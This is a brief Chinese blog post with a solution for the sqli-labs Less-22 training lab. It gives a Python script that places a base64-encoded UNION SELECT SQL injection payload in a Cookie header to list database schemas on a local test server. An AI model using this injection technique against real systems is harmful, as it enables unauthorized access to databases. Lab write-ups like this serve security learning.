[sqli-labs]Less-22(Base64编码 , 明注(Cookie注入))

同样只是稍微修改了SQL语句 , 双引号 , 没有括号

import requests
import base64

url = "http://127.0.0.1/Less-22/"

postDate = {
    'uname':'admin',
    'passwd':'admin' 
}

headers = {
    'Host':'127.0.0.1',
    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0',
    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language':'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
    'Accept-Encoding':'gzip, deflate',
    'Referer':'http://127.0.0.1/Less-20/index.php',
    'Cookie':"uname="+base64.b64encode("\" union select 1,group_concat(schema_name),3 from information_schema.schemata-- "),
    'Connection':'keep-alive',
    'Upgrade-Insecure-Requests':'1',
    'Cache-Control':'max-age=0'
}

content = (requests.post(url, data=postDate, headers=headers).text)
print(content)
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

友情链接更多精彩内容